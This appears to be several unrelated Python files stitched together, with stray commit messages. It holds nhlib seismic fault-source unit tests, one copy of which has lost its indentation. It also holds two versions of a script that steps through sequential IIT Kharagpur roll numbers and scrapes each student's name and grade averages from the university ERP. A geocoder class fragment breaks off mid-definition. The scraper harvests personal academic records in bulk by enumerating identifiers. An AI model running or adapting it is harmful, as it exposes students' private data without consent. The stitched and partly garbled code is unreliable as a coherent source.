        mfd = TruncatedGRMFD(a_val=0.5, b_val=1.0, min_mag=0.5, max_mag=1.5,
                             bin_width=1.0)
        with self.assertRaises(ValueError) as ar:
            self._make_source(mfd=mfd, aspect_ratio=1.0)
        self.assertEqual(str(ar.exception),
                         'mesh spacing 1 is too low to represent '
                         'ruptures of magnitude 1.5')
    def test_fault_trace_intersects_itself(self):
        mfd = TruncatedGRMFD(a_val=0.5, b_val=1.0, min_mag=10, max_mag=20,
                             bin_width=1.0)
        # Self-crossing trace: the last segment cuts back across the first.
        fault_trace = Line([Point(0, 0), Point(0, 1),
                            Point(1, 1), Point(0, 0.5)])
        with self.assertRaises(ValueError) as ar:
            self._make_source(mfd=mfd, aspect_ratio=1, fault_trace=fault_trace)
        self.assertEqual(str(ar.exception), 'fault trace intersects itself')
class SimpleFaultRupEncPolyTestCase(_BaseFaultSourceTestCase):
mfd = TruncatedGRMFD(a_val=0.5, b_val=1.0, min_mag=10, max_mag=20,
bin_width=1.0)
def test_dip_90_no_dilation(self):
trace = Line([Point(0.0, 0.0), Point(0.0, 0.04),
Point(0.03, 0.05), Point(0.04, 0.06)])
source = self._make_source(self.mfd, 1, dip=90, fault_trace=trace)
polygon = source.get_rupture_enclosing_polygon()
elons = [0, 0, 0.04]
elats = [0, 0.04, 0.06]
numpy.testing.assert_allclose(polygon.lons, elons, rtol=0, atol=1e-5)
numpy.testing.assert_allclose(polygon.lats, elats)
def test_dip_90_dilated(self):
trace = Line([Point(-1.0, 2.0), Point(-1.0, 2.04)])
source = self._make_source(self.mfd, 1, dip=90, fault_trace=trace)
polygon = source.get_rupture_enclosing_polygon(dilation=4.5)
elons = [
-1.0405401, -1.0403452, -1.0397622, -1.0387967, -1.0374580,
-1.0357589, -1.0337159, -1.0313487, -1.0286799, -1.0286349,
-1.0256903, -1.0224984, -1.0190897, -1.0154972, -1.0117554,
-1.0079004, -1.0039693, -1.0000000, -0.9960307, -0.9920996,
-0.9882446, -0.9845028, -0.9809103, -0.9775016, -0.9743097,
-0.9713651, -0.9713201, -0.9686513, -0.9662841, -0.9642411,
-0.9625420, -0.9612033, -0.9602378, -0.9596548, -0.9594599,
-0.9594609, -0.9596560, -0.9602391, -0.9612048, -0.9625436,
-0.9642428, -0.9662858, -0.9686531, -0.9713218, -0.9713668,
-0.9743113, -0.9775031, -0.9809116, -0.9845039, -0.9882454,
-0.9921002, -0.9960310, -1.0000000, -1.0039690, -1.0078998,
-1.0117546, -1.0154961, -1.0190884, -1.0224969, -1.0256887,
-1.0286332, -1.0286782, -1.0313469, -1.0337142, -1.0357572,
-1.0374564, -1.0387952, -1.0397609, -1.0403440, -1.0405391
]
elats = [
2.0399995, 2.0439662, 2.0478947, 2.0517472, 2.0554866, 2.0590768,
2.0624833, 2.0656733, 2.0686160, 2.0686610, 2.0713281, 2.0736940,
2.0757358, 2.0774338, 2.0787718, 2.0797368, 2.0803196, 2.0805144,
2.0803196, 2.0797368, 2.0787718, 2.0774338, 2.0757358, 2.0736940,
2.0713281, 2.0686610, 2.0686160, 2.0656733, 2.0624833, 2.0590768,
2.0554866, 2.0517472, 2.0478947, 2.0439662, 2.0399995, 1.9999995,
1.9960328, 1.9921043, 1.9882519, 1.9845126, 1.9809224, 1.9775160,
1.9743261, 1.9713835, 1.9713385, 1.9686715, 1.9663057, 1.9642640,
1.9625660, 1.9612281, 1.9602631, 1.9596804, 1.9594856, 1.9596804,
1.9602631, 1.9612281, 1.9625660, 1.9642640, 1.9663057, 1.9686715,
1.9713385, 1.9713835, 1.9743261, 1.9775160, 1.9809224, 1.9845126,
1.9882519, 1.9921043, 1.9960328, 1.9999999
]
numpy.testing.assert_allclose(polygon.lons, elons)
numpy.testing.assert_allclose(polygon.lats, elats, rtol=0, atol=1e-6)
def test_dip_30_no_dilation(self):
    """A shallow-dipping (dip=30) fault projects onto the surface, so even
    without dilation the enclosing polygon extends beyond the trace."""
    # Expected surface-projection corners of the dipping fault plane.
    expected_lons = [0.0549872, 0., 0., 0.04, 0.09498719]
    expected_lats = [-0.0366581, 0, 0.04, 0.06, 0.02334187]
    fault_line = Line([Point(0.0, 0.0), Point(0.0, 0.04),
                       Point(0.03, 0.05), Point(0.04, 0.06)])
    src = self._make_source(self.mfd, 1, dip=30, fault_trace=fault_line)
    poly = src.get_rupture_enclosing_polygon()
    numpy.testing.assert_allclose(poly.lons, expected_lons, rtol=0, atol=1e-5)
    numpy.testing.assert_allclose(poly.lats, expected_lats, rtol=0, atol=1e-5)
def test_dip_30_dilated(self):
    """Shallow-dipping (dip=30) fault with a 10 km dilation: the polygon is
    the surface projection of the fault plane buffered by 10 km."""
    trace = Line([Point(0.0, 0.0), Point(0.0, 0.04),
                  Point(0.03, 0.05), Point(0.04, 0.06)])
    source = self._make_source(self.mfd, 1, dip=30, fault_trace=trace)
    polygon = source.get_rupture_enclosing_polygon(dilation=10)
    # Expected boundary coordinates of the dilated surface projection.
    elons = [
        0.1298154, 0.1245655, 0.1186454, 0.1121124, 0.1050291,
        0.0974640, 0.0894897, 0.0811832, 0.0726244, 0.0638958,
        0.0550813, 0.0462659, 0.0375346, 0.0289713, 0.0206585,
        0.0126764, 0.0051017, -0.0498855, -0.0569870, -0.0635385,
        -0.0694768, -0.0747446, -0.0792910, -0.0830722, -0.0860516,
        -0.0882006, -0.0894983, -0.0899323, -0.0899323, -0.0894772,
        -0.0881164, -0.0858637, -0.0827419, -0.0787826, -0.0740259,
        -0.0685199, -0.0623203, -0.0554900, -0.0480979, -0.0402191,
        -0.0002190, 0.0076432, 0.0158009, 0.0241796, 0.0327029,
        0.0412927, 0.0498708, 0.0583587, 0.0666790, 0.0747555,
        0.0825147, 0.0898855, 0.1448728, 0.1519670, 0.1585125,
        0.1644462, 0.1697109, 0.1742561, 0.1780378, 0.1810197,
        0.1831731, 0.1844772, 0.1849194, 0.1844956, 0.1832098,
        0.1810743, 0.1781097, 0.1743447, 0.1698154
    ]
    elats = [
        -0.0865436, -0.0936378, -0.1001833, -0.1061170, -0.1113818,
        -0.1159269, -0.1197087, -0.1226906, -0.1248440, -0.1261481,
        -0.1265903, -0.1261665, -0.1248807, -0.1227452, -0.1197807,
        -0.1160156, -0.1114863, -0.0748281, -0.0695722, -0.0636449,
        -0.0571033, -0.0500106, -0.0424352, -0.0344503, -0.0261330,
        -0.0175634, -0.0088243, -0.0000000, 0.0400000, 0.0490364,
        0.0579813, 0.0667442, 0.0752364, 0.0833720, 0.0910686,
        0.0982482, 0.1048383, 0.1107721, 0.1159895, 0.1204378,
        0.1404379, 0.1439098, 0.1466154, 0.1485298, 0.1496358,
        0.1499230, 0.1493889, 0.1480385, 0.1458839, 0.1429450,
        0.1392485, 0.1348282, 0.0981700, 0.0929200, 0.0870000,
        0.0804669, 0.0733837, 0.0658185, 0.0578443, 0.0495378,
        0.0409790, 0.0322503, 0.0234359, 0.0146206, 0.0058892,
        -0.0026741, -0.0109868, -0.0189689, -0.0265436
    ]
    numpy.testing.assert_allclose(polygon.lons, elons, rtol=0, atol=1e-5)
    numpy.testing.assert_allclose(polygon.lats, elats, rtol=0, atol=1e-5)
tests/source/simple_fault: removed unused import
# nhlib: A New Hazard Library
# Copyright (C) 2012 GEM Foundation
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import unittest
import numpy
from nhlib.const import TRT
from nhlib.source.simple_fault import SimpleFaultSource
from nhlib.source.rupture import ProbabilisticRupture
from nhlib.mfd import TruncatedGRMFD
from nhlib.scalerel.peer import PeerMSR
from nhlib.geo import Point, Line
from nhlib.tom import PoissonTOM
from tests import assert_angles_equal
from tests.geo.surface._utils import assert_mesh_is
from tests.source import _simple_fault_test_data as test_data
class _BaseFaultSourceTestCase(unittest.TestCase):
    """Shared fixture for SimpleFaultSource tests: builds test sources and
    compares generated ruptures against precomputed expectations."""
    TRT = TRT.ACTIVE_SHALLOW_CRUST
    RAKE = 0

    def _make_source(self, mfd, aspect_ratio, fault_trace=None, dip=45):
        """Return a SimpleFaultSource with fixed geometry parameters.

        When *fault_trace* is omitted, a default four-point trace is used.
        """
        if fault_trace is None:
            fault_trace = Line([Point(0.0, 0.0),
                                Point(0.0, 0.0359728811758),
                                Point(0.0190775080917, 0.0550503815181),
                                Point(0.03974514139, 0.0723925718855)])
        source_id = name = 'test-source'
        # Fixed parameters: mesh spacing 1 km, seismogenic depths 0..~4.243 km.
        return SimpleFaultSource(
            source_id, name, self.TRT, mfd, 1,
            PeerMSR(), aspect_ratio,
            0, 4.2426406871192848,
            fault_trace, dip, self.RAKE
        )

    def _test_ruptures(self, expected_ruptures, source):
        """Assert that *source* yields exactly *expected_ruptures*."""
        tom = PoissonTOM(time_span=50)
        ruptures = list(source.iter_ruptures(tom))
        # Every rupture must carry the fixture's TOM, TRT and rake.
        for rupture in ruptures:
            self.assertIsInstance(rupture, ProbabilisticRupture)
            self.assertIs(rupture.temporal_occurrence_model, tom)
            self.assertIs(rupture.tectonic_region_type, self.TRT)
            self.assertEqual(rupture.rake, self.RAKE)
        self.assertEqual(len(expected_ruptures), len(ruptures))
        # Pairwise comparison against the precomputed expectations.
        for expected, rupture in zip(expected_ruptures, ruptures):
            self.assertAlmostEqual(rupture.mag, expected['mag'])
            self.assertAlmostEqual(rupture.rake, expected['rake'])
            self.assertAlmostEqual(rupture.occurrence_rate,
                                   expected['occurrence_rate'])
            assert_mesh_is(self, rupture.surface, expected['surface'])
            self.assertEqual(rupture.hypocenter,
                             Point(*expected['hypocenter']))
            assert_angles_equal(self, rupture.surface.get_strike(),
                                expected['strike'], delta=0.5)
            assert_angles_equal(self, rupture.surface.get_dip(),
                                expected['dip'], delta=3)
class SimpleFaultIterRupturesTestCase(_BaseFaultSourceTestCase):
    """Rupture enumeration scenarios for different MFD/aspect-ratio combos."""

    def _check(self, expected, min_mag, max_mag, bin_width, aspect_ratio):
        # Build a truncated GR MFD and compare generated ruptures with
        # the precomputed expectation set.
        mfd = TruncatedGRMFD(a_val=0.5, b_val=1.0, min_mag=min_mag,
                             max_mag=max_mag, bin_width=bin_width)
        source = self._make_source(mfd=mfd, aspect_ratio=aspect_ratio)
        self._test_ruptures(expected, source)

    def test_2(self):
        # Rupture dimensions larger than mesh spacing; even node counts
        # along both strike and dip.
        self._check(test_data.TEST2_RUPTURES, 3.0, 4.0, 1.0, 1.0)

    def test_3(self):
        # Rupture length exceeds fault length; odd node count along
        # length, even along width.
        self._check(test_data.TEST3_RUPTURES, 5.0, 6.0, 1.0, 4.0)

    def test_4(self):
        # Rupture width exceeds fault width; even node count along
        # length, odd along width.
        self._check(test_data.TEST4_RUPTURES, 5.4, 5.5, 0.1, 0.5)

    def test_5(self):
        # Both rupture length and width exceed the fault dimensions.
        self._check(test_data.TEST5_RUPTURES, 6.0, 7.0, 1.0, 1.0)
class SimpleFaultParametersChecksTestCase(_BaseFaultSourceTestCase):
    """Constructor-time validation errors of SimpleFaultSource."""

    def test_mesh_spacing_too_small(self):
        # A 1 km mesh cannot represent the tiny ruptures of this MFD.
        mfd = TruncatedGRMFD(a_val=0.5, b_val=1.0, min_mag=0.5, max_mag=1.5,
                             bin_width=1.0)
        with self.assertRaises(ValueError) as cm:
            self._make_source(mfd=mfd, aspect_ratio=1.0)
        self.assertEqual(str(cm.exception),
                         'mesh spacing 1 is too low to represent '
                         'ruptures of magnitude 1.5')

    def test_fault_trace_intersects_itself(self):
        # A self-crossing trace must be rejected.
        mfd = TruncatedGRMFD(a_val=0.5, b_val=1.0, min_mag=10, max_mag=20,
                             bin_width=1.0)
        trace = Line([Point(0, 0), Point(0, 1),
                      Point(1, 1), Point(0, 0.5)])
        with self.assertRaises(ValueError) as cm:
            self._make_source(mfd=mfd, aspect_ratio=1, fault_trace=trace)
        self.assertEqual(str(cm.exception), 'fault trace intersects itself')
class SimpleFaultRupEncPolyTestCase(_BaseFaultSourceTestCase):
    """Tests for SimpleFaultSource.get_rupture_enclosing_polygon() with
    vertical and shallow-dipping faults, with and without dilation."""
    # MFD is irrelevant to the polygon shape; any valid one will do.
    mfd = TruncatedGRMFD(a_val=0.5, b_val=1.0, min_mag=10, max_mag=20,
                         bin_width=1.0)

    def test_dip_90_no_dilation(self):
        """Vertical fault, no dilation: polygon collapses to the trace."""
        trace = Line([Point(0.0, 0.0), Point(0.0, 0.04),
                      Point(0.03, 0.05), Point(0.04, 0.06)])
        source = self._make_source(self.mfd, 1, dip=90, fault_trace=trace)
        polygon = source.get_rupture_enclosing_polygon()
        elons = [0, 0, 0.04]
        elats = [0, 0.04, 0.06]
        # NOTE(review): tolerance styles differ between the two asserts
        # (explicit atol for lons, defaults for lats) — confirm intent.
        numpy.testing.assert_allclose(polygon.lons, elons, rtol=0, atol=1e-5)
        numpy.testing.assert_allclose(polygon.lats, elats)

    def test_dip_90_dilated(self):
        """Vertical fault dilated by 4.5 km: buffered trace boundary."""
        trace = Line([Point(-1.0, 2.0), Point(-1.0, 2.04)])
        source = self._make_source(self.mfd, 1, dip=90, fault_trace=trace)
        polygon = source.get_rupture_enclosing_polygon(dilation=4.5)
        # Expected boundary coordinates of the buffered polygon.
        elons = [
            -1.0405401, -1.0403452, -1.0397622, -1.0387967, -1.0374580,
            -1.0357589, -1.0337159, -1.0313487, -1.0286799, -1.0286349,
            -1.0256903, -1.0224984, -1.0190897, -1.0154972, -1.0117554,
            -1.0079004, -1.0039693, -1.0000000, -0.9960307, -0.9920996,
            -0.9882446, -0.9845028, -0.9809103, -0.9775016, -0.9743097,
            -0.9713651, -0.9713201, -0.9686513, -0.9662841, -0.9642411,
            -0.9625420, -0.9612033, -0.9602378, -0.9596548, -0.9594599,
            -0.9594609, -0.9596560, -0.9602391, -0.9612048, -0.9625436,
            -0.9642428, -0.9662858, -0.9686531, -0.9713218, -0.9713668,
            -0.9743113, -0.9775031, -0.9809116, -0.9845039, -0.9882454,
            -0.9921002, -0.9960310, -1.0000000, -1.0039690, -1.0078998,
            -1.0117546, -1.0154961, -1.0190884, -1.0224969, -1.0256887,
            -1.0286332, -1.0286782, -1.0313469, -1.0337142, -1.0357572,
            -1.0374564, -1.0387952, -1.0397609, -1.0403440, -1.0405391
        ]
        elats = [
            2.0399995, 2.0439662, 2.0478947, 2.0517472, 2.0554866, 2.0590768,
            2.0624833, 2.0656733, 2.0686160, 2.0686610, 2.0713281, 2.0736940,
            2.0757358, 2.0774338, 2.0787718, 2.0797368, 2.0803196, 2.0805144,
            2.0803196, 2.0797368, 2.0787718, 2.0774338, 2.0757358, 2.0736940,
            2.0713281, 2.0686610, 2.0686160, 2.0656733, 2.0624833, 2.0590768,
            2.0554866, 2.0517472, 2.0478947, 2.0439662, 2.0399995, 1.9999995,
            1.9960328, 1.9921043, 1.9882519, 1.9845126, 1.9809224, 1.9775160,
            1.9743261, 1.9713835, 1.9713385, 1.9686715, 1.9663057, 1.9642640,
            1.9625660, 1.9612281, 1.9602631, 1.9596804, 1.9594856, 1.9596804,
            1.9602631, 1.9612281, 1.9625660, 1.9642640, 1.9663057, 1.9686715,
            1.9713385, 1.9713835, 1.9743261, 1.9775160, 1.9809224, 1.9845126,
            1.9882519, 1.9921043, 1.9960328, 1.9999999
        ]
        numpy.testing.assert_allclose(polygon.lons, elons)
        numpy.testing.assert_allclose(polygon.lats, elats, rtol=0, atol=1e-6)

    def test_dip_30_no_dilation(self):
        """Shallow dip, no dilation: polygon is the fault-plane projection."""
        trace = Line([Point(0.0, 0.0), Point(0.0, 0.04),
                      Point(0.03, 0.05), Point(0.04, 0.06)])
        source = self._make_source(self.mfd, 1, dip=30, fault_trace=trace)
        polygon = source.get_rupture_enclosing_polygon()
        elons = [0.0549872, 0., 0., 0.04, 0.09498719]
        elats = [-0.0366581, 0, 0.04, 0.06, 0.02334187]
        numpy.testing.assert_allclose(polygon.lons, elons, rtol=0, atol=1e-5)
        numpy.testing.assert_allclose(polygon.lats, elats, rtol=0, atol=1e-5)

    def test_dip_30_dilated(self):
        """Shallow dip with 10 km dilation: buffered projection boundary."""
        trace = Line([Point(0.0, 0.0), Point(0.0, 0.04),
                      Point(0.03, 0.05), Point(0.04, 0.06)])
        source = self._make_source(self.mfd, 1, dip=30, fault_trace=trace)
        polygon = source.get_rupture_enclosing_polygon(dilation=10)
        # Expected boundary coordinates of the dilated surface projection.
        elons = [
            0.1298154, 0.1245655, 0.1186454, 0.1121124, 0.1050291,
            0.0974640, 0.0894897, 0.0811832, 0.0726244, 0.0638958,
            0.0550813, 0.0462659, 0.0375346, 0.0289713, 0.0206585,
            0.0126764, 0.0051017, -0.0498855, -0.0569870, -0.0635385,
            -0.0694768, -0.0747446, -0.0792910, -0.0830722, -0.0860516,
            -0.0882006, -0.0894983, -0.0899323, -0.0899323, -0.0894772,
            -0.0881164, -0.0858637, -0.0827419, -0.0787826, -0.0740259,
            -0.0685199, -0.0623203, -0.0554900, -0.0480979, -0.0402191,
            -0.0002190, 0.0076432, 0.0158009, 0.0241796, 0.0327029,
            0.0412927, 0.0498708, 0.0583587, 0.0666790, 0.0747555,
            0.0825147, 0.0898855, 0.1448728, 0.1519670, 0.1585125,
            0.1644462, 0.1697109, 0.1742561, 0.1780378, 0.1810197,
            0.1831731, 0.1844772, 0.1849194, 0.1844956, 0.1832098,
            0.1810743, 0.1781097, 0.1743447, 0.1698154
        ]
        elats = [
            -0.0865436, -0.0936378, -0.1001833, -0.1061170, -0.1113818,
            -0.1159269, -0.1197087, -0.1226906, -0.1248440, -0.1261481,
            -0.1265903, -0.1261665, -0.1248807, -0.1227452, -0.1197807,
            -0.1160156, -0.1114863, -0.0748281, -0.0695722, -0.0636449,
            -0.0571033, -0.0500106, -0.0424352, -0.0344503, -0.0261330,
            -0.0175634, -0.0088243, -0.0000000, 0.0400000, 0.0490364,
            0.0579813, 0.0667442, 0.0752364, 0.0833720, 0.0910686,
            0.0982482, 0.1048383, 0.1107721, 0.1159895, 0.1204378,
            0.1404379, 0.1439098, 0.1466154, 0.1485298, 0.1496358,
            0.1499230, 0.1493889, 0.1480385, 0.1458839, 0.1429450,
            0.1392485, 0.1348282, 0.0981700, 0.0929200, 0.0870000,
            0.0804669, 0.0733837, 0.0658185, 0.0578443, 0.0495378,
            0.0409790, 0.0322503, 0.0234359, 0.0146206, 0.0058892,
            -0.0026741, -0.0109868, -0.0189689, -0.0265436
        ]
        numpy.testing.assert_allclose(polygon.lons, elons, rtol=0, atol=1e-5)
        numpy.testing.assert_allclose(polygon.lats, elats, rtol=0, atol=1e-5)
|
import requests
from bs4 import BeautifulSoup
import time
def is_number(s):
    """Return True if *s* can be parsed as a float, False otherwise."""
    try:
        float(s)
    except ValueError:
        return False
    else:
        return True
def cg_accumulate(year, dep, degree_choice, sg_cg_choice):
# List of departments with Integrated M.Sc. (5 year courses)
msc_dep_list = ["GG", "EX", "MA", "CY", "HS", "PH"]
msc_dep = False
print ""
fname = "Output.txt"
roll_count = 10000
if degree_choice == "2":
roll_count = 30000
if dep in msc_dep_list:
roll_count = 20000
msc_dep = True
student_count = 0
flag = False
cg_total = 0.00
sg_total = 0.00
bad_count = 0
while True:
roll_count += 1
student_count += 1
rollno = str(year) + str(dep) + str(roll_count)
url_to_scrape = 'https://erp.iitkgp.ernet.in/StudentPerformance/view_performance.jsp?rollno=' + rollno
name_flag = False
try:
r = requests.get(url_to_scrape)
except Exception:
print "ConnectionError on :" + str(roll_count)
print "Retrying...."
student_count -= 1
roll_count -= 1
continue
soup = BeautifulSoup(r.text, "html.parser")
with open(fname, "w") as text_file:
text_file.write("{}".format(soup))
with open(fname) as f:
content = f.readlines()
for line in content:
if len(content) < 40:
flag = True
bad_count += 1
student_count -= 1
break
bad_count = 0
if line.find("Name") != -1 and not name_flag:
idx = 24
while(line[idx]!='<'):
idx += 1
name = line[24:idx]
name_flag = True
if sg_cg_choice == "1":
if line.find("CGPA") != -1:
if line[4] != "<" and is_number(line[31:35]):
#print line[31:35]
print "Roll Num : " + str(rollno) + " CG : " + str(line[31:35]) + " Name : " + str(name)
cg_total += float(line[31:35])
break
elif sg_cg_choice == "2":
if line.find("SGPA") != -1 and is_number(line[25:29]):
print "Roll Num : " + str(rollno) + " SGPA in most recent semester : " + str(line[25:29]) + " Name : " + str(name)
sg_total += float(line[25:29])
break
if flag and bad_count >= 5 and (degree_choice != "3" or roll_count > 30000):
break
# Will not be executed for MSc Integrated Courses
if flag and bad_count >= 5 and not msc_dep:
roll_count = 30000
print "Making transition to dual degree students..."
continue
student_count -= 1
print ""
print "__________________________________"
print "Number of Students : " + str(student_count)
if sg_cg_choice == "1":
print "Total CG : " + str(cg_total)
print "Average CG : " + str(cg_total / student_count)
elif sg_cg_choice == "2":
print "Total SG : " + str(sg_total)
print "Average SG : " + str(sg_total / student_count)
print "__________________________________"
# Interactive entry point: prompt for batch parameters, then run the scraper.
print "Welcome to CG Accumulator"
# Valid department codes and admission years accepted by the prompts below.
departments = ["AE", "AG", "AR", "BT", "CE", "CH", "CS", "CY", "EC", "EE", "EX", "GG", "HS", "IE", "IM", "MA", "ME", "MF", "MI", "MT", "NA", "PH", "QD"]
years = ["12","13","14","15"]
while True:
    print ""
    year = raw_input("Enter year (Available Choices : 12, 13, 14, 15) : ")
    if year not in years:
        print "Please enter a valid year choice"
        continue
    print ""
    dep = raw_input("Enter Department : ")
    # Re-prompt until a valid (upper-case) department code is given.
    while dep not in departments:
        print "Please enter a valid department!"
        print "P.S. Department name should be capitalised. Eg. \"CS\" and not \"cs\""
        dep = raw_input("Enter Valid Department again : ")
    print ""
    degree_choice = raw_input("Enter choice : '1' for 4 years only, '2' for 5 years only, '3' for both : ")
    while degree_choice not in ["1", "2", "3"]:
        print "Please enter a valid choice!"
        degree_choice = raw_input("Enter valid choice again : ")
    print ""
    sg_cg_choice = raw_input("Do you want CG list (enter '1') or most recent SG list (enter '2')? : ")
    while sg_cg_choice not in ["1","2"]:
        print "Please enter a valid choice!"
        sg_cg_choice = raw_input("Enter valid choice again : ")
    # All inputs validated — leave the prompt loop.
    break
print ""
print "Please wait while results are being accumulated, this may take a few minutes...."
print "Meanwhile, minimize this screen and think about what you are doing with your life."
print ""
# cg_accumulate prints its own report and returns None.
var = cg_accumulate(year, dep, degree_choice,sg_cg_choice)
key = raw_input("Press Enter to exit")
Add entire SG list feature
import requests
from bs4 import BeautifulSoup
import time
def is_number(s):
    """Return True if *s* parses as a float, False otherwise."""
    try:
        float(s)
    except ValueError:
        return False
    else:
        return True
def cg_accumulate(year, dep, degree_choice, sg_cg_choice):
    """Scrape the ERP performance pages for every roll number of a batch.

    sg_cg_choice: "1" prints/accumulates CGPA, "2" the most recent SGPA,
    "3" prints the full SGPA history list per student.
    """
    # List of departments with Integrated M.Sc. (5 year courses);
    # their roll numbers start at 20xxx instead of 10xxx/30xxx.
    msc_dep_list = ["GG", "EX", "MA", "CY", "HS", "PH"]
    msc_dep = False
    print ""
    fname = "Output.txt"
    roll_count = 10000
    if degree_choice == "2":
        roll_count = 30000
    if dep in msc_dep_list:
        roll_count = 20000
        msc_dep = True
    student_count = 0
    flag = False
    cg_total = 0.00
    sg_total = 0.00
    bad_count = 0  # consecutive "empty page" responses seen so far
    sg_list = []   # per-student SGPA history (choice "3" only)
    while True:
        roll_count += 1
        student_count += 1
        rollno = str(year) + str(dep) + str(roll_count)
        url_to_scrape = 'https://erp.iitkgp.ernet.in/StudentPerformance/view_performance.jsp?rollno=' + rollno
        name_flag = False
        try:
            r = requests.get(url_to_scrape)
        except Exception:
            # Network hiccup: retry the same roll number.
            print "ConnectionError on :" + str(roll_count)
            print "Retrying...."
            student_count -= 1
            roll_count -= 1
            continue
        # Round-trip the page through a file before scanning line by line.
        soup = BeautifulSoup(r.text, "html.parser")
        with open(fname, "w") as text_file:
            text_file.write("{}".format(soup))
        with open(fname) as f:
            content = f.readlines()
        for line in content:
            # Pages shorter than 40 lines carry no performance data.
            if len(content) < 40:
                flag = True
                bad_count += 1
                student_count -= 1
                break
            bad_count = 0
            # Student name starts at column 24 of the "Name" line.
            if line.find("Name") != -1 and not name_flag:
                idx = 24
                while(line[idx]!='<'):
                    idx += 1
                name = line[24:idx]
                name_flag = True
            if sg_cg_choice == "1":
                if line.find("CGPA") != -1:
                    # CGPA value occupies fixed columns 31:35.
                    if line[4] != "<" and is_number(line[31:35]):
                        print "Roll Num : " + str(rollno) + " CG : " + str(line[31:35]) + " Name : " + str(name)
                        cg_total += float(line[31:35])
                        break
            elif sg_cg_choice == "2":
                # SGPA value occupies fixed columns 25:29.
                if line.find("SGPA") != -1 and is_number(line[25:29]):
                    print "Roll Num : " + str(rollno) + " SGPA in most recent semester : " + str(line[25:29]) + " Name : " + str(name)
                    sg_total += float(line[25:29])
                    break
            elif sg_cg_choice == "3":
                # Collect every SGPA occurrence (no break: full history).
                if line.find("SGPA") != -1 and is_number(line[25:29]):
                    sg_list.append(str(line[25:29]))
        # Print and reset the per-student SGPA history.
        # NOTE(review): on an empty page 'name'/'sg_list' may be stale
        # from the previous student — presumably harmless; confirm.
        if sg_cg_choice == "3":
            print "Roll Num : " + str(rollno) + " SGPA list : " + str(sg_list) + " Name : " + str(name)
            del sg_list[:]
        # Stop after 5 consecutive empty pages, unless we still need to
        # transition to the dual-degree 30xxx range (choice "3" only;
        # MSc Integrated departments have no dual-degree range).
        if flag and bad_count >= 5 and (degree_choice != "3" or roll_count > 30000 or msc_dep):
            break
        # Will not be executed for MSc Integrated Courses
        if flag and bad_count >= 5 and not msc_dep:
            roll_count = 30000
            print "Making transition to dual degree students..."
            continue
    # Undo the increment made for the final (empty) roll number.
    student_count -= 1
    print ""
    print "__________________________________"
    print "Number of Students : " + str(student_count)
    # No summary is printed for choice "3" (history is printed per student).
    if sg_cg_choice == "1":
        print "Total CG : " + str(cg_total)
        print "Average CG : " + str(cg_total / student_count)
    elif sg_cg_choice == "2":
        print "Total SG : " + str(sg_total)
        print "Average SG : " + str(sg_total / student_count)
    print "__________________________________"
# Interactive entry point: prompt for batch parameters, then run the scraper.
print "*** Welcome to CG Accumulator ***"
# Valid department codes and admission years accepted by the prompts below.
departments = ["AE", "AG", "AR", "BT", "CE", "CH", "CS", "CY", "EC", "EE", "EX", "GG", "HS", "IE", "IM", "MA", "ME", "MF", "MI", "MT", "NA", "PH", "QD"]
years = ["12","13","14","15"]
while True:
    print ""
    year = raw_input("Enter year (Available Choices : 12, 13, 14, 15) : ")
    if year not in years:
        print "Please enter a valid year choice"
        continue
    print ""
    dep = raw_input("Enter Department : ")
    # Re-prompt until a valid (upper-case) department code is given.
    while dep not in departments:
        print "Please enter a valid department!"
        print "P.S. Department name should be capitalised. Eg. \"CS\" and not \"cs\""
        dep = raw_input("Enter Valid Department again : ")
    print ""
    degree_choice = raw_input("Enter choice : '1' for 4 years only, '2' for 5 years only, '3' for both : ")
    while degree_choice not in ["1", "2", "3"]:
        print "Please enter a valid choice!"
        degree_choice = raw_input("Enter valid choice again : ")
    print ""
    sg_cg_choice = raw_input("Do you want CG list (enter '1') or most recent SG list (enter '2') or entire SG history (enter '3')? : ")
    while sg_cg_choice not in ["1", "2", "3"]:
        print "Please enter a valid choice!"
        sg_cg_choice = raw_input("Enter valid choice again : ")
    # All inputs validated — leave the prompt loop.
    break
print ""
print "Please wait while results are being accumulated, this may take a few minutes...."
print "Meanwhile, minimize this screen and think about what you are doing with your life."
print ""
# cg_accumulate prints its own report and returns None.
var = cg_accumulate(year, dep, degree_choice,sg_cg_choice)
print ""
key = raw_input("Press Enter to exit")
|
#!/usr/bin/python
# coding: utf8
from __future__ import absolute_import
import requests
import sys
import json
import six
from collections import defaultdict, OrderedDict
from orderedset import OrderedSet
from geocoder.distance import Distance
try:
from urlparse import urlparse
except ImportError:
from urllib.parse import urlparse
# True when running under Python 2.x; used to select py2/py3 code paths.
is_python2 = sys.version_info < (3, 0)
class Base(object):
    """Base class for single-result geocoder providers.

    Subclasses are expected to set ``url``, ``provider``, ``method`` and
    implement ``next()`` (assumption from the attribute accesses below —
    none are defined here; TODO confirm against subclasses).  The class
    performs the HTTP request, parses the JSON response into a nested
    ``defaultdict`` tree (``self.parse``) and exposes normalized address
    and geometry accessors.
    """
    # Attribute/method names excluded from the exported ``json`` payload.
    _exclude = ['parse', 'json', 'url', 'fieldnames', 'help', 'debug',
                'short_name', 'api', 'content', 'params',
                'street_number', 'api_key', 'key', 'id', 'x', 'y',
                'latlng', 'headers', 'timeout', 'wkt', 'locality',
                'province', 'rate_limited_get', 'osm', 'route', 'schema',
                'properties', 'geojson', 'tree', 'error', 'proxies', 'road',
                'xy', 'northeast', 'northwest', 'southeast', 'southwest',
                'road_long', 'city_long', 'state_long', 'country_long',
                'postal_town_long', 'province_long', 'road_long',
                'street_long', 'interpolated', 'method', 'geometry', 'session']
    fieldnames = []
    error = None
    status_code = None
    session = None
    # NOTE(review): mutable class-level dicts — ``_connect`` mutates them
    # via ``self.headers.update(...)``, so state is shared across ALL
    # instances of the class.  Worth confirming this is intentional.
    headers = {}
    params = {}
    # Essential attributes for Quality Control
    lat = ''
    lng = ''
    accuracy = ''
    quality = ''
    # NOTE(review): shadowed by the ``confidence`` property defined below.
    confidence = ''
    # Bounding Box attributes
    northeast = []
    northwest = []
    southeast = []
    southwest = []
    bbox = {}
    # Essential attributes for Street Address
    address = ''
    housenumber = ''
    street = ''
    # NOTE(review): shadowed by the ``road`` property defined below.
    road = ''
    city = ''
